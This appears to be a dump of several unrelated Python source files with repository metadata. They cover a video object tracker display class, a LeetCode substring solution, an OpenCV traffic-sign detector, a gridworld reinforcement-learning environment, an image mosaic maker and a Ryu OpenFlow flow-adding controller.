self.paused = False
self.img = None
self.times = 1
self.filename = filename
if not os.path.exists(filename):
os.mkdir(filename)
self.fname = open(filename+'/'+tracker_name+'.txt','w')
self.fname.write('%-8s%-8s%-8s%-8s%-8s%-8s%-8s%-8s%-8s\n'%('frame','ulx','uly','urx','ury','lrx','lry','llx','lly'))
cv2.namedWindow(self.name)
#cv2.setMouseCallback(self.name, self.mouse_handler4)
#self.writer = cv2.VideoWriter('alpha.avi',cv.CV_FOURCC('D','I','V','3'),10,size)
def display(self, img):
annotated_img = img.copy()
if self.tracker.is_initialized():
corners = self.tracker.get_region()
draw_region(annotated_img, corners, (0,255,0), 2)
self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
# '''
# if self.m_start != None and self.m_end != None:
# ul = (min(self.m_start[0],self.m_end[0]), min(self.m_start[1],self.m_end[1]))
# lr = (max(self.m_start[0],self.m_end[0]), max(self.m_start[1],self.m_end[1])) # corners = np.array([ ul, [lr[0],ul[1]], lr, [ul[0],lr[1]]]).T
# '''
elif len(self.initparamtemp) == 4:
corners = self.initparamtemp
draw_region(annotated_img, corners, (255,0,0), 1)
#self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
cv2.imshow(self.name, annotated_img)
cv.WaitKey(500)
#if self.times == 1: cv.WaitKey(6000)
#self.writer.write(annotated_img)
cv.SaveImage( self.filename+'/'+'%04d'%self.times+'.jpg',cv.fromarray(annotated_img))
def mouse_handler(self, evt,x,y,arg,extra):
if self.gray_img == None: return
if evt == cv2.EVENT_LBUTTONDOWN and self.m_start == None:
self.m_start = (x,y)
self.m_end = (x,y)
self.paused = True
elif evt == cv2.EVENT_MOUSEMOVE and self.m_start != None:
self.m_end = (x,y)
elif evt == cv2.EVENT_LBUTTONUP:
self.m_end = (x,y)
ul = (min(self.m_start[0],self.m_end[0]), min(self.m_start[1],self.m_end[1]))
lr = (max(self.m_start[0],self.m_end[0]), max(self.m_start[1],self.m_end[1]))
self.tracker.initialize_with_rectangle(self.gray_img, ul, lr)
self.m_start, self.m_end = None, None
self.paused = False
self.inited = True
#cv.WaitKey(1000)
def mouse_handler4(self,evt,x,y,arg,extra):
if self.gray_img == None: return
if evt == cv2.EVENT_LBUTTONDOWN and len(self.initparamtemp) <= 3:
self.initparamtemp.append([x,y])
self.paused = True
elif evt == cv2.EVENT_LBUTTONDOWN and len(self.initparamtemp) == 4:
self.initparamtemp = []
self.initparamtemp.append([x,y])
self.paused = True
if len(self.initparamtemp) == 4:
self.initparam = np.array(self.initparamtemp).T
self.tracker.initialize(self.gray_img,self.initparam)
self.paused = False
self.inited = True
def on_frame(self, img, numtimes,initparamtemp):
print(numtimes)
self.times = numtimes
if numtimes == 150:
#cv.WaitKey(6000)
#self.initparamtemp = [[336,165],[362,165],[362,226],[336,226]]
self.initparamtemp = initparamtemp
self.initparam = np.array(self.initparamtemp).T
self.gray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
self.gray_img = self.gray_img.astype(np.float64)
self.tracker.initialize(self.gray_img,self.initparam)
self.paused = False
self.inited = True
'''
if len(self.initparamtemp) == 4:
corners =
self.fname.write('%-15s%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f%-8.2f\n'%('frame'+('%05d'%(self.times))+'.jpg',corners[0,0],corners[1,0],corners[0,1],corners[1,1],corners[0,2],corners[1,2],corners[0,3],corners[1,3]))
'''
if not self.paused:
self.img = img
self.gray_img = cv2.GaussianBlur(to_grayscale(img), (5,5), 3)
#self.gray_img = to_grayscale(img)
self.tracker.update(self.gray_img)
#else:
# cv.WaitKey(10)
if self.img != None: self.display(self.img)
key = cv.WaitKey(7)
if key == ord(' '): self.paused = not self.paused
elif key > 0: return False
self.times = self.times + 1
return True
def cleanup(self):
#cv2.destroyWindow(self.name)
#pass
self.fname.close()
#self.writer.release
| [
"ankush1123roy@gmail.com"
] | ankush1123roy@gmail.com |
871132389561d6b5b48a9d5e7d876bc1654d5ee6 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /30.py | 75414b4d6be012ed0fdb069967fc9cd91daa06d6 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | # ref: https://discuss.leetcode.com/topic/10665/concise-python-code-using
# -defaultdict
import collections
import copy
class Solution(object):
def findSubstring(self, s, words):
"""
:type s: str
:type words: List[str]
:rtype: List[int]
"""
if not words or not words[0]:
return None
wl, total, strlen, res = (len(words[0]), len(words) * len(words[0]),
len(s), [])
word_ctr = collections.Counter(words)
for i in xrange(wl):
j = i
count = copy.copy(word_ctr)
while j < strlen - wl + 1:
count[s[j:j + wl]] -= 1
while count[s[j:j + wl]] < 0:
count[s[i:i + wl]] += 1
i += wl
j += wl
if j - i == total:
res += i,
return res
if __name__ == '__main__':
sol = Solution()
print sol.findSubstring('barfoothefoobarman', ['foo', 'bar'])
| [
"b93902098@ntu.edu.tw"
] | b93902098@ntu.edu.tw |
d8fef3f5a96c4891f675eb2abd81d61207e43e46 | 4c80bcfba6f0a6869ff6ff1d2f7e965f82867049 | /Optical Flow/main.py | e7c671d162e669aaabda1e9b914fa3dca1df3b71 | [] | no_license | himol7/Traffic-Sign-Detection-and-Classification-Under-Challenging-Conditions | 358ca1544c367c41502053d8220f11cb34ae214f | c20109db7f83de8759dae2d0bbc4b14a60e65feb | refs/heads/master | 2020-04-10T13:03:56.758935 | 2018-12-09T14:57:53 | 2018-12-09T14:57:53 | 161,039,040 | 8 | 2 | null | 2018-12-09T12:51:42 | 2018-12-09T12:51:42 | null | UTF-8 | Python | false | false | 14,518 | py | import cv2
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
from skimage.feature import blob_dog, blob_log, blob_doh
import imutils
import argparse
import os
import math
from classification import training, getLabel
SIGNS = ["ERROR",
"STOP",
"TURN LEFT",
"TURN RIGHT",
"DO NOT TURN LEFT",
"DO NOT TURN RIGHT",
"ONE WAY",
"SPEED LIMIT",
"OTHER"]
# Clean all previous file
def clean_images():
file_list = os.listdir('./')
for file_name in file_list:
if '.png' in file_name:
os.remove(file_name)
### Preprocess image
def constrastLimit(image):
img_hist_equalized = cv2.cvtColor(image, cv2.COLOR_BGR2YCrCb)
channels = cv2.split(img_hist_equalized)
channels[0] = cv2.equalizeHist(channels[0])
img_hist_equalized = cv2.merge(channels)
img_hist_equalized = cv2.cvtColor(img_hist_equalized, cv2.COLOR_YCrCb2BGR)
return img_hist_equalized
def LaplacianOfGaussian(image):
LoG_image = cv2.GaussianBlur(image, (3,3), 0) # paramter
gray = cv2.cvtColor( LoG_image, cv2.COLOR_BGR2GRAY)
LoG_image = cv2.Laplacian( gray, cv2.CV_8U,3,3,2) # parameter
LoG_image = cv2.convertScaleAbs(LoG_image)
return LoG_image
def binarization(image):
thresh = cv2.threshold(image,32,255,cv2.THRESH_BINARY)[1]
#thresh = cv2.adaptiveThreshold(image,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,11,2)
return thresh
def preprocess_image(image):
image = constrastLimit(image)
image = LaplacianOfGaussian(image)
image = binarization(image)
return image
# Find Signs
def removeSmallComponents(image, threshold):
#find all your connected components (white blobs in your image)
nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(image, connectivity=8)
sizes = stats[1:, -1]; nb_components = nb_components - 1
img2 = np.zeros((output.shape),dtype = np.uint8)
#for every component in the image, you keep it only if it's above threshold
for i in range(0, nb_components):
if sizes[i] >= threshold:
img2[output == i + 1] = 255
return img2
def findContour(image):
#find contours in the thresholded image
cnts = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE )
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
return cnts
def contourIsSign(perimeter, centroid, threshold):
# perimeter, centroid, threshold
# # Compute signature of contour
result=[]
for p in perimeter:
p = p[0]
distance = sqrt((p[0] - centroid[0])**2 + (p[1] - centroid[1])**2)
result.append(distance)
max_value = max(result)
signature = [float(dist) / max_value for dist in result ]
# Check signature of contour.
temp = sum((1 - s) for s in signature)
temp = temp / len(signature)
if temp < threshold: # is the sign
return True, max_value + 2
else: # is not the sign
return False, max_value + 2
#crop sign
def cropContour(image, center, max_distance):
width = image.shape[1]
height = image.shape[0]
top = max([int(center[0] - max_distance), 0])
bottom = min([int(center[0] + max_distance + 1), height-1])
left = max([int(center[1] - max_distance), 0])
right = min([int(center[1] + max_distance+1), width-1])
print(left, right, top, bottom)
return image[left:right, top:bottom]
def cropSign(image, coordinate):
width = image.shape[1]
height = image.shape[0]
top = max([int(coordinate[0][1]), 0])
bottom = min([int(coordinate[1][1]), height-1])
left = max([int(coordinate[0][0]), 0])
right = min([int(coordinate[1][0]), width-1])
#print(top,left,bottom,right)
return image[top:bottom,left:right]
def findLargestSign(image, contours, threshold, distance_theshold):
max_distance = 0
coordinate = None
sign = None
for c in contours:
M = cv2.moments(c)
if M["m00"] == 0:
continue
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
is_sign, distance = contourIsSign(c, [cX, cY], 1-threshold)
if is_sign and distance > max_distance and distance > distance_theshold:
max_distance = distance
coordinate = np.reshape(c, [-1,2])
left, top = np.amin(coordinate, axis=0)
right, bottom = np.amax(coordinate, axis = 0)
coordinate = [(left-2,top-2),(right+3,bottom+1)]
sign = cropSign(image,coordinate)
return sign, coordinate
def findSigns(image, contours, threshold, distance_theshold):
signs = []
coordinates = []
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
if M["m00"] == 0:
continue
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
is_sign, max_distance = contourIsSign(c, [cX, cY], 1-threshold)
if is_sign and max_distance > distance_theshold:
sign = cropContour(image, [cX, cY], max_distance)
signs.append(sign)
coordinate = np.reshape(c, [-1,2])
top, left = np.amin(coordinate, axis=0)
right, bottom = np.amax(coordinate, axis = 0)
coordinates.append([(top-2,left-2),(right+1,bottom+1)])
return signs, coordinates
def localization(image, min_size_components, similitary_contour_with_circle, model, count, current_sign_type):
original_image = image.copy()
binary_image = preprocess_image(image)
binary_image = removeSmallComponents(binary_image, min_size_components)
binary_image = cv2.bitwise_and(binary_image,binary_image, mask=remove_other_color(image))
#binary_image = remove_line(binary_image)
cv2.imshow('BINARY IMAGE', binary_image)
contours = findContour(binary_image)
#signs, coordinates = findSigns(image, contours, similitary_contour_with_circle, 15)
sign, coordinate = findLargestSign(original_image, contours, similitary_contour_with_circle, 15)
text = ""
sign_type = -1
i = 0
if sign is not None:
sign_type = getLabel(model, sign)
sign_type = sign_type if sign_type <= 8 else 8
text = SIGNS[sign_type]
cv2.imwrite(str(count)+'_'+text+'.png', sign)
if sign_type > 0 and sign_type != current_sign_type:
cv2.rectangle(original_image, coordinate[0],coordinate[1], (0, 255, 0), 1)
font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(original_image,text,(coordinate[0][0], coordinate[0][1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
return coordinate, original_image, sign_type, text
def remove_line(img):
gray = img.copy()
edges = cv2.Canny(gray,50,150,apertureSize = 3)
minLineLength = 5
maxLineGap = 3
lines = cv2.HoughLinesP(edges,1,np.pi/180,15,minLineLength,maxLineGap)
mask = np.ones(img.shape[:2], dtype="uint8") * 255
if lines is not None:
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(mask,(x1,y1),(x2,y2),(0,0,0),2)
return cv2.bitwise_and(img, img, mask=mask)
def remove_other_color(img):
frame = cv2.GaussianBlur(img, (3,3), 0)
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of blue color in HSV
lower_blue = np.array([100,128,0])
upper_blue = np.array([215,255,255])
# Threshold the HSV image to get only blue colors
mask_blue = cv2.inRange(hsv, lower_blue, upper_blue)
lower_white = np.array([0,0,128], dtype=np.uint8)
upper_white = np.array([255,255,255], dtype=np.uint8)
# Threshold the HSV image to get only blue colors
mask_white = cv2.inRange(hsv, lower_white, upper_white)
lower_black = np.array([0,0,0], dtype=np.uint8)
upper_black = np.array([170,150,50], dtype=np.uint8)
mask_black = cv2.inRange(hsv, lower_black, upper_black)
mask_1 = cv2.bitwise_or(mask_blue, mask_white)
mask = cv2.bitwise_or(mask_1, mask_black)
# Bitwise-AND mask and original image
#res = cv2.bitwise_and(frame,frame, mask= mask)
return mask
def main(args):
#Clean previous image
clean_images()
#Training phase
model = training()
vidcap = cv2.VideoCapture(args.file_name)
fps = vidcap.get(cv2.CAP_PROP_FPS)
width = vidcap.get(3) # float
height = vidcap.get(4) # float
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi',fourcc, fps , (640,480))
# initialize the termination criteria for cam shift, indicating
# a maximum of ten iterations or movement by a least one pixel
# along with the bounding box of the ROI
termination = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1)
roiBox = None
roiHist = None
success = True
similitary_contour_with_circle = 0.65 # parameter
count = 0
current_sign = None
current_text = ""
current_size = 0
sign_count = 0
coordinates = []
position = []
file = open("Output.txt", "w")
while True:
success,frame = vidcap.read()
if not success:
print("FINISHED")
break
width = frame.shape[1]
height = frame.shape[0]
#frame = cv2.resize(frame, (640,int(height/(width/640))))
frame = cv2.resize(frame, (640,480))
print("Frame:{}".format(count))
#image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
coordinate, image, sign_type, text = localization(frame, args.min_size_components, args.similitary_contour_with_circle, model, count, current_sign)
if coordinate is not None:
cv2.rectangle(image, coordinate[0],coordinate[1], (255, 255, 255), 1)
print("Sign:{}".format(sign_type))
if sign_type > 0 and (not current_sign or sign_type != current_sign):
current_sign = sign_type
current_text = text
top = int(coordinate[0][1]*1.05)
left = int(coordinate[0][0]*1.05)
bottom = int(coordinate[1][1]*0.95)
right = int(coordinate[1][0]*0.95)
position = [count, sign_type if sign_type <= 8 else 8, coordinate[0][0], coordinate[0][1], coordinate[1][0], coordinate[1][1]]
cv2.rectangle(image, coordinate[0],coordinate[1], (0, 255, 0), 1)
font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(image,text,(coordinate[0][0], coordinate[0][1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
tl = [left, top]
br = [right,bottom]
print(tl, br)
current_size = math.sqrt(math.pow((tl[0]-br[0]),2) + math.pow((tl[1]-br[1]),2))
# grab the ROI for the bounding box and convert it
# to the HSV color space
roi = frame[tl[1]:br[1], tl[0]:br[0]]
roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#roi = cv2.cvtColor(roi, cv2.COLOR_BGR2LAB)
# compute a HSV histogram for the ROI and store the
# bounding box
roiHist = cv2.calcHist([roi], [0], None, [16], [0, 180])
roiHist = cv2.normalize(roiHist, roiHist, 0, 255, cv2.NORM_MINMAX)
roiBox = (tl[0], tl[1], br[0], br[1])
elif current_sign:
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
backProj = cv2.calcBackProject([hsv], [0], roiHist, [0, 180], 1)
# apply cam shift to the back projection, convert the
# points to a bounding box, and then draw them
(r, roiBox) = cv2.CamShift(backProj, roiBox, termination)
pts = np.int0(cv2.boxPoints(r))
s = pts.sum(axis = 1)
tl = pts[np.argmin(s)]
br = pts[np.argmax(s)]
size = math.sqrt(pow((tl[0]-br[0]),2) +pow((tl[1]-br[1]),2))
print(size)
if current_size < 1 or size < 1 or size / current_size > 30 or math.fabs((tl[0]-br[0])/(tl[1]-br[1])) > 2 or math.fabs((tl[0]-br[0])/(tl[1]-br[1])) < 0.5:
current_sign = None
print("Stop tracking")
else:
current_size = size
if sign_type > 0:
top = int(coordinate[0][1])
left = int(coordinate[0][0])
bottom = int(coordinate[1][1])
right = int(coordinate[1][0])
position = [count, sign_type if sign_type <= 8 else 8, left, top, right, bottom]
cv2.rectangle(image, coordinate[0],coordinate[1], (0, 255, 0), 1)
font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(image,text,(coordinate[0][0], coordinate[0][1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
elif current_sign:
position = [count, sign_type if sign_type <= 8 else 8, tl[0], tl[1], br[0], br[1]]
cv2.rectangle(image, (tl[0], tl[1]),(br[0], br[1]), (0, 255, 0), 1)
font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(image,current_text,(tl[0], tl[1] -15), font, 1,(0,0,255),2,cv2.LINE_4)
if current_sign:
sign_count += 1
coordinates.append(position)
cv2.imshow('Result', image)
count = count + 1
#Write to video
out.write(image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
file.write("{}".format(sign_count))
for pos in coordinates:
file.write("\n{} {} {} {} {} {}".format(pos[0],pos[1],pos[2],pos[3],pos[4], pos[5]))
print("Finish {} frames".format(count))
file.close()
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="NLP Assignment Command Line")
parser.add_argument(
'--file_name',
default= "./Videos/MVI_1049.avi",
help= "Video to be analyzed"
)
parser.add_argument(
'--min_size_components',
type = int,
default= 300,
help= "Min size component to be reserved"
)
parser.add_argument(
'--similitary_contour_with_circle',
type = float,
default= 0.65,
help= "Similitary to a circle"
)
args = parser.parse_args()
main(args)
| [
"noreply@github.com"
] | himol7.noreply@github.com |
ef8b694de6c2ac6d30f02461ff1ca3cdcf3cd010 | 837377dc4df28263a61ee4af32514b52f3beb976 | /scripts/inverse_reinforcement_learning/envs/gridworld.py | a35a714dc92bf33cb95d8012cb7d6d70b952727c | [] | no_license | aoyan27/reinforcement_learning | 2279a36c1ba0cec1f4e254af71ebb6e6431b5636 | 9170e9e720e0e1a541b586465e01bd89555d27f2 | refs/heads/master | 2021-09-08T01:21:53.630653 | 2018-03-05T03:19:59 | 2018-03-05T03:19:59 | 100,631,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,341 | py | #!/usr/bin.env python
#coding:utf-8
import numpy as np
class Gridworld:
def __init__(self, rows, cols, R_max, noise):
self.rows = rows
self.cols = cols
self.n_state = self.rows * self.cols
self.R_max = R_max
self.noise = noise
self.grid = np.zeros((self.rows, self.cols))
# +----------------> x
# |
# |
# |
# |
# |
# |
# V
# y
self.goal = (self.rows-1, self.cols-1)
self.grid[self.goal] = self.R_max
self.action_list = [0, 1, 2, 3, 4]
self.n_action = len(self.action_list)
self.dirs = {0: '>', 1: '<', 2: 'v', 3: '^', 4: '-'}
self.state_ = None
self.out_of_range_ = None
def state2index(self, state):
# state[0] : y
# state[1] : x
# return state[1] + self.cols * state[0]
return state[0] + self.cols * state[1]
def index2state(self, index):
state = [0, 0]
state[0] = index % self.cols
state[1] = index / self.cols
return state
def get_next_state_and_probs(self, state, action):
transition_probability = 1 - self.noise
probs = np.zeros([self.n_action])
probs[int(action)] = transition_probability
probs += self.noise / self.n_action
# print "probs : "
# print probs
next_state_list = []
for a in xrange(self.n_action):
if state != list(self.goal):
# print "state : ", state
next_state, out_of_range = self.move(state, a)
self.out_of_range_ = out_of_range
# print "next_state() : "
# print next_state
next_state_list.append(next_state)
if out_of_range:
probs[self.n_action-1] += probs[a]
probs[a] = 0
else:
next_state = state
# print "probs[", a, "] : ", probs[a]
if a != self.n_action-1:
probs[self.n_action-1] += probs[a]
probs[a] = 0
next_state_list.append(next_state)
# print "next_state_ : "
# print next_state
# print "next_state_list : "
# print next_state_list
# print "probs_ : "
# print probs
return next_state_list, probs
def get_transition_matrix(self):
P = np.zeros((self.n_state, self.n_state, self.n_action), dtype=np.float32)
for state_index in xrange(self.n_state):
state = self.index2state(state_index)
# print "state : ", state
for action_index in xrange(self.n_action):
action = self.action_list[action_index]
# print "action : ", action
next_state_list, probs = self.get_next_state_and_probs(state, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
for i in xrange(len(probs)):
next_state = next_state_list[i]
# print "next_state : ", next_state
next_state_index = self.state2index(next_state)
probability = probs[i]
# print "probability : ", probability
P[state_index, next_state_index, action_index] = probability
# print "P : "
# print P
# print P.shape
return P
def move(self, state, action):
y, x = state
if action == 0:
# right
x = x + 1
elif action == 1:
# left
x = x - 1
elif action == 2:
# down
y = y + 1
elif action == 3:
# up
y = y - 1
else:
# stay
x = x
y = y
out_of_range = False
if x < 0:
x = 0
out_of_range = True
elif x > (self.cols-1):
x = self.cols - 1
out_of_range = True
if y < 0:
y = 0
out_of_range = True
elif y > (self.rows-1):
y = self.rows - 1
out_of_range = True
return [y, x], out_of_range
def show_policy(self, policy, deterministic=True):
vis_policy = np.array([])
if deterministic:
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[policy[i]])
# print self.dirs[policy[i]]
else:
# for i in xrange(len(policy)):
# # print "np.sum(policy[s]) : ", np.sum(policy[i])
# random_num = np.random.rand()
# # print "random_num : ", random_num
# action_index = 0
# for j in xrange(len(policy[i])):
# random_num -= policy[i][j]
# # print "random_num_ : ", random_num
# if random_num < 0:
# action_index = j
# break
# vis_policy = np.append(vis_policy, self.dirs[action_index])
# # print self.dirs[action_index]
for i in xrange(len(policy)):
vis_policy = np.append(vis_policy, self.dirs[np.argmax(policy[i])])
vis_policy = vis_policy.reshape((self.rows, self.cols)).transpose()
vis_policy[self.goal] = 'G'
print vis_policy
def terminal(self, state):
episode_end = False
if state == list(self.goal):
episode_end = True
return episode_end
def reset(self, start_position=[0,0]):
self.state_ = start_position
return self.state_
def step(self, action, reward_map=None):
next_state_list, probs = self.get_next_state_and_probs(self.state_, action)
# print "next_state_list : ", next_state_list
# print "probs : ", probs
random_num = np.random.rand()
# print "random_num : ", random_num
index = 0
for i in xrange(len(probs)):
random_num -= probs[i]
# print "random_num_ : ", random_num
if random_num < 0:
index = i
break
# print "index : ", index
# print "next_state : ", next_state_list[index]
self.state_ = next_state_list[index]
# self.state_, _ = self.move(self.state_, action)
reward = None
if reward_map is None:
if self.state_ == list(self.goal):
reward = self.R_max
else:
reward = 0
else:
reward = reward_map[self.state2index(self.state_)]
# print "reward : ", reward
episode_end = self.terminal(self.state_)
return self.state_, reward, episode_end, {'probs':probs, 'random_num':random_num}
if __name__=="__main__":
rows = 5
cols = 5
R_max = 10.0
noise = 0.3
env = Gridworld(rows, cols, R_max, noise)
print "env.n_state : ", env.n_state
print "env.n_action : ", env.n_action
max_episode = 1000
max_step = 200
# reward_map = np.load('./reward_map.npy')
# print "reward_map : "
# print reward_map
reward_map = np.zeros([rows, cols])
reward_map[rows-1, cols-1] = R_max
for i in xrange(max_episode):
print "================================================="
print "episode : ", i+1
observation = env.reset()
for j in xrange(max_step):
print "---------------------------------------------"
state = observation
print "state : ", state
action = np.random.randint(env.n_action)
print "action : ", action, env.dirs[action]
# observation, reward, done, info = env.step(action)
observation, reward, done, info = env.step(action, reward_map)
next_state = observation
print "next_state : ", next_state
print "reward : ", reward
print "episode_end : ", done
# print "info : ", info
print "step : ", j+1
if done:
break
| [
"ce62001@meiji.ac.jp"
] | ce62001@meiji.ac.jp |
dce3ca6bb9e7f047acd4519df5a741b2d272fc7a | 4cee60f2f2a271de1f3a9f7c4b8e8bad42aa6a60 | /mosaic.py | c38c372f319efb8df4a77dea873ad439fdcd468b | [
"Apache-2.0"
] | permissive | bartoszptak/Mosaic_maker | 86f6706f2b520114229b5aaf98feb997019db902 | 50166305eb2ffea075c67b28a97900dead74a466 | refs/heads/master | 2021-10-29T14:46:29.398427 | 2019-10-18T08:11:49 | 2019-10-18T08:11:49 | 208,629,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | import cv2
import numpy as np
import numpy.ma as ma
import time
COLORS = 32
def get_mosaic_list():
"""Return the list of mosaic titles."""
from glob import glob
files = glob('data/tiles/*.png')
result = []
for file in files:
result.append(file.split('/')[-1].split('.')[0].title())
return sorted(result)
def read_all(file, tile):
"""Return the loaded image and tile."""
org = cv2.imread(file)
tile = cv2.imread(f'data/tiles/{tile}.png')
return org, tile
def resize_all(img, tile, size):
"""Resize image elements."""
img = cv2.resize(img, (0, 0), fx=1/(size/2), fy=1/(size/2))
tile = cv2.resize(tile, (size, size))
tile = tile.astype('float')
return img, tile
def quantize_colors(img, colors):
"""Reduce the number of colors in the image."""
img = img.astype('float')
return np.round(img/255*colors)/colors*255
def make_move_color(result, tile, scale, yx, bgr):
"""Move a tile of the right color to the image."""
patt = tile.copy()
patt += bgr
patt[ma.masked_where(patt > 255, patt).mask] = 255.
y, x = yx[0]*scale, yx[1]*scale
result[y:y+scale, x:x+scale] = patt
def get_mosaic(img, tile, size, shape):
"""A function that creates a mosaic."""
result = np.ones((img.shape[0]*size, img.shape[1]
* size, 3), dtype=np.float32)*255
for y in range(img.shape[0]):
for x in range(img.shape[1]):
make_move_color(result, tile, size, (y, x), img[y, x])
result = result.astype('uint8')
return cv2.resize(result, (shape[1], shape[0]))
def make_mosaic(img_file, tile_file, size):
"""The main function that loads the image, processes and saves."""
img, tile = read_all(img_file, tile_file)
shape = img.shape
img, tile = resize_all(img, tile, size)
img = quantize_colors(img, COLORS)
mosaic = get_mosaic(img, tile, size, shape)
cv2.imwrite(img_file, mosaic)
| [
"bartptak@gmail.com"
] | bartptak@gmail.com |
8f2212df179883468530dd1fd6f1c1df00460046 | 1ca5db01f7214346cc06315c142df81d2bfcdec0 | /add_flow.py | 1338eb818c03ffc9084677019d2abd51b6ca3e0a | [] | no_license | XoulKool/AddFlow | f8bb39edb52d7d0bfa117faff1bcf9a5916b4eaf | 3e0de07da3dddca07c806e8bb33c7d64c88abf4a | refs/heads/master | 2020-04-18T04:09:42.772656 | 2017-08-28T20:50:54 | 2017-08-28T20:50:54 | 66,281,422 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,216 | py | # Copyright (C) 2011 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An OpenFlow 1.0 L2 learning switch implementation.
"""
import time
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
k = 0
f1 = open('sslog1.txt', 'a')
f2 = open('sslog2.txt', 'a')
class SimpleSwitch(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(
in_port=in_port)
mod = datapath.ofproto_parser.OFPFlowMod(
datapath=datapath, match=match, cookie=0,
command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
priority=ofproto.OFP_DEFAULT_PRIORITY,
flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
datapath.send_msg(mod)
def remove_table_flows(self, datapath, table_id, match, actions):
"""Create OFP flow mod message to remove flows from table."""
ofproto = datapath.ofproto
flow_mod = datapath.ofproto_parser.OFPFlowMod(datapath, match=match, cookie=0, command=ofproto.OFPFC_DELETE, idle_timeout=0,hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY,flags=ofproto.OFPFF_SEND_FLOW_REM,
actions=actions)
return flow_mod
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
global k
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, msg.in_port)
# install a flow to avoid packet_in next tim
if k == 0:
self.add_flow(datapath, 2, [datapath.ofproto_parser.OFPActionOutput(1)])
f1.write(str(int(time.time() * 1000000)))
f1.write('\n')
self.add_flow(datapath, 1, [datapath.ofproto_parser.OFPActionOutput(2)])
f2.write(str(int(time.time() * 1000000)))
f2.write('\n')
k = 1
##new code which activates method to delete all flows
# empty_match = parser.OFPMatch()
# instructions = []
# flow_mod = self.remove_table_flows(datapath, 0,
# empty_match, instructions)
# datapath.send_msg(flow_mod)
@set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def _port_status_handler(self, ev):
msg = ev.msg
reason = msg.reason
port_no = msg.desc.port_no
ofproto = msg.datapath.ofproto
if reason == ofproto.OFPPR_ADD:
self.logger.info("port added %s", port_no)
elif reason == ofproto.OFPPR_DELETE:
self.logger.info("port deleted %s", port_no)
